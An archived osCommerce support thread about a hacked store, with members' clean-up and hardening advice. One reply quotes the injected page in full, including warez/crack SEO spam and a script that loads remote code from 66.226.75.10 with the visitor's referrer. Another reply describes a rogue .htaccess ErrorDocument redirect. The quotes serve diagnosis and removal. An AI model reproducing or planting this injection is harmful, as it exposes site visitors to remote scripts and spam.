Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Site Hacked - Help!


tomknapp

Recommended Posts

I have an OsCommerce site that was hacked. I have re-uploaded a fresh copy of the website to the server but the hacked changes still show up. Can someone please check this out and give me some ideas on how to fix this? Every time you click on any of the Categories it displays some junk website on my page.

 

site: http://www.atoztheatrical.com/catalog/catalog

 

Help!

 

Thanks,

 

Tom

Link to comment
Share on other sites

I have an OsCommerce site that was hacked. I have re-uploaded a fresh copy of the website to the server but the hacked changes still show up. Can someone please check this out and give me some ideas on how to fix this? Every time you click on any of the Categories it displays some junk website on my page.

 

site: http://www.atoztheatrical.com/catalog/catalog

 

Help!

 

Thanks,

 

Tom

 

I would suggest removing this from the index.php

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<html>
<head>
<title>30</title>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META http-equiv="Content-Language" content="en-us">
<META http-equiv="no-cache">
<META name="robots" content="index,follow">
<META name="revisit" content="3 days">
<META name="Subject" Content="30, call of duty n-gage free full, cool edit pro II, crack clondvd 4322">

<META name="description" Content="30, XPlite and 2000lite v1.7 torrent, Vanilla Ninja - Cool vibes MP3 DOWNLOADS, worms 4 mayhem protection key, partyhardcore 2003, free bs nude.com, key generator de photoshop 8, 30069, litepro key, Monster Garage license code hack, REG CODE SOLID WORKS 2006">
<META name="keywords" Content="30, fifa 06 pc serial codes, total recorder 4.3 keygen download, Sony PSP Manager Serial Key, crack tangotime, pc game crack free full download pharaoh, megaupload net transport 1.94c, Serious Sam௼? cheat code, antihack free, no_cd Command and Conquer Generals Zero Hour">
<STYLE>
body td {
font: 14px Arial, Helvetica, Sans-Serif;
margin: 0px 0px 0px 0px;
vertical-align: top;
}
.data{
border-width: 1px;
border-color:grey;
width: 600px;
background-color:EEEEEE;
border-style: solid;
padding: 10px 10px
}
.sidebar{
width: 400px;
}
ul li  { 
font-size:11px; 
margin:10px 5px ;  
padding: 2px 0 0 15px; 
list-style:none;
text-align:left;
}
p {
border-bottom:1px dotted #959595; 
}
</STYLE>
</head>
<body>
<script>
document.write("\<script");
document.write(" src=\"http://66.226.75.10/?j="+escape(document.referrer)+"\"\>");
document.write("\<\/script\>");
</SCRIPT>
<CENTER>
<!-- <form><input type="hidden" name="osCsid" value="0678af12e3d31af27f18114882b0f274" /> -->
<INPUT size="41" name="q"> <INPUT type="submit" value="search">
<!-- </form> -->
<TABLE>
<tr><td>
Search history:
<div class="data"><i>Jun 19, 2008</i><p>paris hilton gratis video download software torrent, Serious Sam௼? cheat code, bittorent games download pc, keygen zone alarm pro 6, business card check virginia visa, free download prince of persia s60, 50cent litte boy, dvd region css key crack, descarga de trial bike basic, x-win32 5.11 crack serial, REG CODE SOLID WORKS 2006, crack clondvd 4322, crackz du meter, download GTA San Andreas porno</p><i>Jun 18, 2008</i><p>download digital voice editor 2, Call of Duty 2 game install crack, warez wifi key, intitle:index.of?mp3[elvis presley, kide game, nautica thorn free wallpaper, windows 2000 pro sp4 keygen serialz crack, hack subseven 2.2.0 download, babilon key activation, windvr 2 trial free download, Cd-key sim city 4 deluxe, x-win32 5.11 crack serial, medieval download total war manual</p><i>Jun 17, 2008</i><p>NOD 32 2.5 reg. key, Warcraft Dota Allstars Patch Download, bridge commander 1.3 patch no cd, 3d sex villa 2.2 crack, crack need for speed underground speed.exe, free download full version BPM studio pro, partyhardcore 2003, programas hackers para sony ericsson k750i, 646988, FREE VOICE TWEAKER, free pvplayer application for n-gage, desperado antonio banderas free mp3, cs 1.5 trainer, xdiv gratis player</p><i>Jun 16, 2008</i><p>capoeira fighter license code, download GTA San Andreas porno, ma-620 window media control driver, cs 1.6 v21 downloads, total recorder 4.3 keygen download, sims downloads mirror, total recorder 4.3 keygen download, war3x 1.20b crack, windows 2000 pro sp4 keygen serialz crack, dungeon siege 2 version 2.2 no-cd crack, PowerQuest 7.03 free, the legend of zelda full version free download, act=ST;f=6;t=77, Tibia trainers that dont need passwords, s55 com port, war3x 1.20b crack, descargar UpToDate, alkohol krak downloads, fifa 06 pc serial codes, co tafar</p><i>Jun 15, 2008</i><p>CRAKS ROME TOTAL WAR, gtaIII free keygen, patch no cd vietcong purple haze, taxi movie torrent, bittorent games download pc, crack need for speed underground speed.exe, nautica thorn free wallpaper, editplus cheat code, serial zend 4.0.2, cd-death counter strike 1.5 dowload, apez bot download, linking park piano keys, johan gielen free mp3 download, unlock garmin img files, oss video converter 5.1.0</p><i>Jun 14, 2008</i><p>www.kubuś, no_cd Command and Conquer Generals Zero Hour, jay-z sextape, warez craks excel, Sexy whistle wav, serial key medal of honor allied, crack alkohol 120% 1. 9. 2, download free roadrash full version game <a href="MEDAL-OF-HONOR-PACIFIC-ASSAULT-CD-CEY.html?osCsid=0678af12e3d31af27f18114882b0f274" title="MEDAL OF HONOR PACIFIC ASSAULT CD CEY">MEDAL OF HONOR PACIFIC ASSAULT CD CEY</a> sims downloads mirror, ip switch whatsup Gold 6.02 download, like to move it.avi, download free roadrash full version game, crack clondvd 4322, 6230 jar game, Fhoto shop 8.0, dame el serial del office xp</p></div>

</td>
<td class="sidebar">
<ul>
Top queries:<li>code proevolution soccer 5, sw doctor 3.0.0.288 download, free mobile media browser for nokia 6020, mp3 doctor megaupload, free diablo2 lod cd-keys, cool edit pro II, ISA 2004 LICENSE CRACK, metastock 8.0 cd check registry, descargar gratis Close Combat: First To Fight (Mac</li><li>4music multiformat 1.55 serial, cd key jewel quest, partyhardcore 2003, free mobile media browser for nokia 6020, dap premium serialz, free AABBYY Fine Reader, download Cracking tools to Crack Shareware Softwares, no_cd Command and Conquer Generals Zero Hour, jean claude borelly windows media, Yahoo! booter, free mr skin hack</li><li>Halo Keycode generators downloaden, keygen zone alarm pro 6, AVG plus Firewall 7.1.crack, Kreludan Mining Corp. cheat authorization, s55 com port, claves del juego silent hill 1, download gunbound hack program, CRAKS ROME TOTAL WAR, marilin manson torrent</li><li>jean claude borelly windows media, download gunbound hack program, XPlite and 2000lite v1.7 torrent, free full neopets computer game downloads, autoroute per 6600 tomtom patch, hunterxhunter free movie</li><li>river past video cleaner 6.12 s/n, mpeg to RM freedownload, the legend of zelda full version free download, 7732, wow cd to 1.5</li>Most wanted:<li>business card check virginia visa, DOWNLOAD Marlin Studios, download GTA San Andreas porno, descargar gratis el demo starcraft para xp, code proevolution soccer 5, registry mechanic 3.0 s/n, midtown madness download free ftp, mp3 doctor megaupload, kaht3 download free, pda crackz, alias maya 7.0 keygen.rar, halo key no</li><li>cVALKA siemens, nexus the jupiter incident cd key generators, gprs software free download, Diablo II Lord Of Destruction 1.11b Patch & NoCD Crack.zip, rpg maker xp buy, gprs software free download, free videocam series v2 cd-key and serial number, media builder 4.9.6, registration code for PC cillin 2006, gtaIII free keygen, free videocam series v2 cd-key and serial number, free mr skin hack, alkohol krak downloads, sim university download for free, ProEngineer CDkey</li><li>mobilphone video converter, mp3 doctor megaupload, patch no cd vietcong purple haze, MainConcept full appz, dap premium serialz, Kaspersky AntiVirus Personal Pro 5.0.390 regkey, cd key jewel quest, index of norton 2005, tutorial need for speed most wanted</li><li>oss video converter 5.1.0, downloud Diablo, NOD 32 2.5 reg. key, nod32 fre download, N.E.R.D. lap dance video uncensored, bittorent veritus</li><li>NHL2006 EA SPORTS CHEATS, freeware 3gp clips, cs 1.5 trainer, Halo Keycode generators downloaden, number serial rogue spear, n.gage music downlod, vista Windows Media Player 11 downloud, warcraft1 crack, command and conquer generals cd-key downloud, hunterxhunter free movie, parent directory sex rmvb, metastock 8.0 cd check registry, parent directory sex rmvb, quake 3 frogs bot, Roller coaster tycoon Demo hack</li><li>Advance WMA Workshop V 2.0 .3, cd-death counter strike 1.5 dowload, google earth key reg, registry mechanic 3.0 s/n, Bass Pro Fishing 2003 Keygen, autoroute per 6600 tomtom patch, free mobile media browser for nokia 6020, sco unix serial during installation, total recorder 4.3 keygen download <a href="alias-maya-7.0-keygen.rar.html?osCsid=0678af12e3d31af27f18114882b0f274" title="alias maya 7.0 keygen.rar">alias maya 7.0 keygen.rar</a> ida pro torrent disassembler, Halo Keycode generators downloaden, EMS SQL Manager 3 free registration key, cs 1.6 v21 no steam download, project 5 cakewalk serial crack, halo key no, N.E.R.D. lap dance video uncensored, warcraft1 crack</li><li>vypress chat v2.1 sn, Vanilla Ninja - Cool vibes MP3 DOWNLOADS, download accelerator 7.5.1.6 serial crack, first in lady life, uplink-1.31 trainer, Hide Folder Lite serial number, s55 com port, jean claude borelly windows media</li><li>oziexplorer key download, nokia 6670 freeware applications, Bass Pro Fishing 2003 Keygen, oss video converter 5.1.0, smart movie crack for nokia 6630, 3d sex villa 2.2 crack, Kaspersky AntiVirus Personal Pro 5.0.390 regkey</li></ul>

</td>
</tr>


</TABLE>
</CENTER>
</body>

 

 

Then, I would suggest changing passwords for your FTP and Host if you still have access.

 

 

Good Luck

 

 

Chris

Link to comment
Share on other sites

Thanks for the post, but as I stated before I have uploaded a fresh copy of the website to the server. But that did not fix the issue. Is there someplace else that can be the issue?

Thanks

Link to comment
Share on other sites

Check your /catalog/images folder and all the sub-folders.

 

My guess is you'll find a number of "rogue" PHP files you didn't put there.

 

And I'd also bet they got there because your catalog/images has 777 permissions...

:blush:

 

They should be no higher than 755.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

  • 3 weeks later...
Thanks for the post, but as I stated before I have uploaded a fresh copy of the website to the server. But that did not fix the issue. Is there someplace else that can be the issue?

Thanks

Solution to your problem:

 

Go into your ftp and open up your .htaccess files

If you see something similar to this:

Options -MultiViews

ErrorDocument 404 //anydirectory/49740.php

Get rid of that section of code because it is loading ads and a bunch of other bullcrap from 66.226.75.10

Someone is using you to make ad revenue off your site.

 

Also remove the "######.PHP" files your .HTTACCESS files are pointing to. In this this case "49740.php"

 

I hope this helps.

Link to comment
Share on other sites

The simple reason why the oscommerce is getting hacked is: Your hosting provider is not securing properly server as with proper firewall all attempts of the hacks can be prevented. As sever admin I can say that people are trying to hack oscommerce carts and being banned automatically by firewall on all my servers, as for me I am getting the security logs by email about this attempts. :blink: :D

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Link to comment
Share on other sites

  • 1 month later...

I had this prolem yesterday as well. For me, the default cache directory was still being used. Trying disabling cache and see if that doesnt restore to original...

Link to comment
Share on other sites

Check your /catalog/images folder and all the sub-folders.

 

My guess is you'll find a number of "rogue" PHP files you didn't put there.

 

And I'd also bet they got there because your catalog/images has 777 permissions...

:blush:

 

They should be no higher than 755.

 

Just another ?

 

In the post install states that admin/images/graphs should be 777 would that afect this and make it easyier

to hack the site ?

 

just a thought

Link to comment
Share on other sites

my suggestion is:

you may want to protect your admin section with a second password.

for example.

 

When I attempt to log into my admin panel, I have to login TO LOGIN.

MEANING, I setup password protection ("for my admin folder") from inside

my hosting file manager. So everytime I want to edit my website from the admin

area, as soon as I enter mysite.com/catalog/admin a password box would appear

("before the actual login page shows up") please note that I would not be able to

login until I enter the correct password. When correct password is entered; Then I

am redirected to my admin login section.

 

I know that this isn't the best way to protect your website, but at least it does makes

it harder for unauthorized people to login or attempt to crack your password. and even

if one password is cracked, the second password would hold them up until they loose

interest ("at least"). As for me, I make it my business to change this second password

("at least") every week, to provide added sense of security.

 

But seriously, Consider re-installing your website.

1.locate and erase all rogue files, back up your website

2.erase your entire host and database

3.create new host and database w/t new passwords

4.upload your website and re-install it, using your backup store tables so your store info remains intact..

5.protect your admin directory with a second password ("from inside your hosting account-file manager") so you have to login twice to enter your admin section. ('note to everyone.')

 

Lastly, Please inspect your database tables to make sure that there are not any rogue tables existing on your database.

("in case you can't locate any rogue files.")

Link to comment
Share on other sites

I use the login to login check too, I password protected the admin directory (after I'd renamed it as well, and changed the path in configure.php) via my cPanel.

 

I also use several contributions to keep an eye on things:

 

Security Pro

Site Monitor

IP Trap

 

are the main ones. There's also antixss (anti cross site scripting) which I haven't installed yet.

Link to comment
Share on other sites

I use the login to login check too, I password protected the admin directory (after I'd renamed it as well, and changed the path in configure.php) via my cPanel.

 

I also use several contributions to keep an eye on things:

 

Security Pro

Site Monitor

IP Trap

 

are the main ones. There's also antixss (anti cross site scripting) which I haven't installed yet.

 

Hi could you give me a pointer on how to set up. log in to log in?

Link to comment
Share on other sites

Hi could you give me a pointer on how to set up. log in to log in?

 

The RC versions of osCommerce contain a database driven login to the osCommerce 'admin' panel. Unfortunately these do not ring alarm bells on the server if someone uses a piece of hacker software known as a "Password Cracker", which runs random combinations of User Name and Password against the login a large number of times per second.

 

On the other hand if the folder in which the osCommerce control panel is located is Password Protected using your Web Hosting control panel (which uses .htaccess for Apache servers) the attempts to use a Password Cracker against .htaccess files will ring alarm bells on the server, and after X number of attempts the server will automatically block the ip address of the perpetrator (provided the server is set up securely).

 

On an RC version of osCommerce this requires a double login - first to get past the .htaccess password protection on the folder, and then to get past the osCommerce login. On earlier MS2 versions only the .htaccess login is required.

 

BASIC SECURITY PRECAUTIONS

 

1. FTP to your website and rename the osCommerce 'admin' folder to something unique (not admin2 or newadmin).

2. In your renamed admin/includes/configure.php file change the references to /admin/ to /new_name/

3. Using your Web Hosting control panel (not your osCommerce admin panel) use its Directory or Password Protect link to password protect the newly renamed 'admin' folder.

4. No folder should have permissions higher than 755. If your hosting requires that you use 777 (Full) permissions then find another host.

5. Almost all files should have permissions of 644 and no higher. The two configure.php files will need permissions of 644, 444 or 400 (depending on your server set up).

 

I do wish that the osCommerce Forum Administrator would do what Zen Cart successfully does - have a "Recovering From Hacks" Forum with pinned advice on what to do to recover from hacks. Users can also post if they think or know they have been hacked and receive advice from knowledgeable members or Team Members, and even have the ability to email sensitive data directly to Team Members.

 

Vger

Link to comment
Share on other sites

The RC versions of osCommerce contain a database driven login to the osCommerce 'admin' panel. Unfortunately these do not ring alarm bells on the server if someone uses a piece of hacker software known as a "Password Cracker", which runs random combinations of User Name and Password against the login a large number of times per second.

 

On the other hand if the folder in which the osCommerce control panel is located is Password Protected using your Web Hosting control panel (which uses .htaccess for Apache servers) the attempts to use a Password Cracker against .htaccess files will ring alarm bells on the server, and after X number of attempts the server will automatically block the ip address of the perpetrator (provided the server is set up securely).

 

On an RC version of osCommerce this requires a double login - first to get past the .htaccess password protection on the folder, and then to get past the osCommerce login. On earlier MS2 versions only the .htaccess login is required.

 

BASIC SECURITY PRECAUTIONS

 

1. FTP to your website and rename the osCommerce 'admin' folder to something unique (not admin2 or newadmin).

2. In your renamed admin/includes/configure.php file change the references to /admin/ to /new_name/

3. Using your Web Hosting control panel (not your osCommerce admin panel) use its Directory or Password Protect link to password protect the newly renamed 'admin' folder.

4. No folder should have permissions higher than 755. If your hosting requires that you use 777 (Full) permissions then find another host.

5. Almost all files should have permissions of 644 and no higher. The two configure.php files will need permissions of 644, 444 or 400 (depending on your server set up).

 

I do wish that the osCommerce Forum Administrator would do what Zen Cart successfully does - have a "Recovering From Hacks" Forum with pinned advice on what to do to recover from hacks. Users can also post if they think or know they have been hacked and receive advice from knowledgeable members or Team Members, and even have the ability to email sensitive data directly to Team Members.

 

Vger

 

Thanks so much, I managed to do that (complete osc noob) at least my site is a little better protected.

 

Do you have any other security "must do's" following a standard osc install?

 

:D

Link to comment
Share on other sites

The RC versions of osCommerce contain a database driven login to the osCommerce 'admin' panel. Unfortunately these do not ring alarm bells on the server if someone uses a piece of hacker software known as a "Password Cracker", which runs random combinations of User Name and Password against the login a large number of times per second.

 

On the other hand if the folder in which the osCommerce control panel is located is Password Protected using your Web Hosting control panel (which uses .htaccess for Apache servers) the attempts to use a Password Cracker against .htaccess files will ring alarm bells on the server, and after X number of attempts the server will automatically block the ip address of the perpetrator (provided the server is set up securely).

 

On an RC version of osCommerce this requires a double login - first to get past the .htaccess password protection on the folder, and then to get past the osCommerce login. On earlier MS2 versions only the .htaccess login is required.

 

BASIC SECURITY PRECAUTIONS

 

1. FTP to your website and rename the osCommerce 'admin' folder to something unique (not admin2 or newadmin).

2. In your renamed admin/includes/configure.php file change the references to /admin/ to /new_name/

3. Using your Web Hosting control panel (not your osCommerce admin panel) use its Directory or Password Protect link to password protect the newly renamed 'admin' folder.

4. No folder should have permissions higher than 755. If your hosting requires that you use 777 (Full) permissions then find another host.

5. Almost all files should have permissions of 644 and no higher. The two configure.php files will need permissions of 644, 444 or 400 (depending on your server set up).

 

I do wish that the osCommerce Forum Administrator would do what Zen Cart successfully does - have a "Recovering From Hacks" Forum with pinned advice on what to do to recover from hacks. Users can also post if they think or know they have been hacked and receive advice from knowledgeable members or Team Members, and even have the ability to email sensitive data directly to Team Members.

 

Vger

you make a very good Point. And I seriously agree with you; Vger on your advice. There couldn't be enough ways to protect your investments. and creating a forum board to address such issues would be a wonderful idea. In that way,

not only will people be able to post topics and get help quickly; but other oSc users can also learn from the mistakes of others at the same token.

 

Hacking, Cracking and hijacking is a problem that can never be be resolved, but at least such resources and info sharing

(on the users end) would be a very great way to counter these problems. (at least)

I seriously think that such a forum would help out the entire community. And I (too) hope that the forum administrators take: Vger's advice into consideration.

Link to comment
Share on other sites

Hi could you give me a pointer on how to set up. log in to log in?

 

It's very simple to create a Login to Login check point.

all you have to do is

1. Login into your " hosting account " File manager ("not osc file manager")

2. From inside your hosting file manager, you can highlight or check the check box next to your admin directory

3. then Click or select the permissions button and select: "password Protect directory"

4. select add user to create your directory user & password.

 

and when you are done, you would have to login twice to enter your admin area.

it's that simple.

Link to comment
Share on other sites

99.9% of hacks are not osCommerce hacks and it is naive to think they are. They are just website hacks. It does not matter if you have an HTML site or a PHP site or Zen Cart or osCommerce.

 

They are placing files in vulnerable folders (e.g. the numeric files in the hack above), editing common files such as index.html or index.php (the classic iframe hack) or adding tables to your database (the classic eBay Motors scam).

 

If they are specificially hacking osCommerce you can be sure they are either a "ha ha" hack where they hack Admin and modify your catalog or worse restore an old database or they are serious and editing your checkout/payment modules (the classic email me the credit card details hack) which is usually an "in-house" job.

 

The osCommerce forum cannot be all things to all people. There are lots of security forums out there that address the above and I think that it is good policy for osCommerce store users to be members of them.

Link to comment
Share on other sites

  • 4 months later...

Hi,

 

I changed the name of the admin folder within OSC. I did this and changed the links in the config file. I goto the new admin login page, put in my usernam and password but I get the following error,

 

The requested URL /oscommerce/iadmin/login.php?action=process&osCAdminID=521be1da53d894a146dd2a27bbef6c1f was not found on this server.

 

iadmin being the OLD directory name.

 

Can you help please.

Link to comment
Share on other sites

Hi,

 

I changed the name of the admin folder within OSC. I did this and changed the links in the config file. I goto the new admin login page, put in my usernam and password but I get the following error,

 

The requested URL /oscommerce/iadmin/login.php?action=process&osCAdminID=521be1da53d894a146dd2a27bbef6c1f was not found on this server.

 

iadmin being the OLD directory name.

 

Can you help please.

 

Since I changed the admin folder name and changed the 2 entries in the configure.php file, how come it is still referencing "/oscommerce/iadmin/login.php" as above? (iadmin being the old admin folder name). Are there other files that I need to change?

 

Please help.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...